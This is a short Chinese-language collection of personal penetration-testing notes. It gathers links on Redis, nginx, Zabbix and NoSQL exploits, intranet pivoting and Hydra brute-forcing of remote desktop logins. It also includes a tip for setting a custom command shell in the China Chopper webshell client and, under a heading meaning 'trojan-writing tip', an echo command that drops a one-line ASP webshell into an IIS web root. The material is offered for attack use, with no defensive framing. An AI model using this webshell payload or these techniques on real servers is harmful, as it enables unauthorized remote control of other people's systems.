不错的漏洞

http://www.secpulse.com/archives/3537.html

http://www.secpulse.com/archives/2225.html

http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/

http://drops.wooyun.org/papers/2466

菜刀技巧：

有两种方法可以设置指定的cmd路径，一就是在cmd操作界面，输入setp d:\cmd.exe，就可以了，或者把cmd.exe上传到目录，然后点右键,点virtual terminal file，就可以进入自定义CMD.EXE路径的命令行了

写木马技巧

echo ^<^%execute^(request^("eval"^)^)^%^>  c:\inetpub\wwwroot\cms\test123456.asp

内网渗透：

http://www.freebuf.com/articles/system/8499.html

nginx解析漏洞

http://drops.wooyun.org/tips/2006

http://segmentfault.com/q/1010000002927290

http://www.jb51.net/article/74629.htm

zabbix漏洞：

http://www.wooyun.org/bugs/wooyun-2013-023089
http://wooyun.org/bugs/wooyun-2010-0149599

nosql注入：

http://www.freebuf.com/articles/database/95314.html

hydra爆破3389:

http://www.cnblogs.com/hkleak/p/5169079.html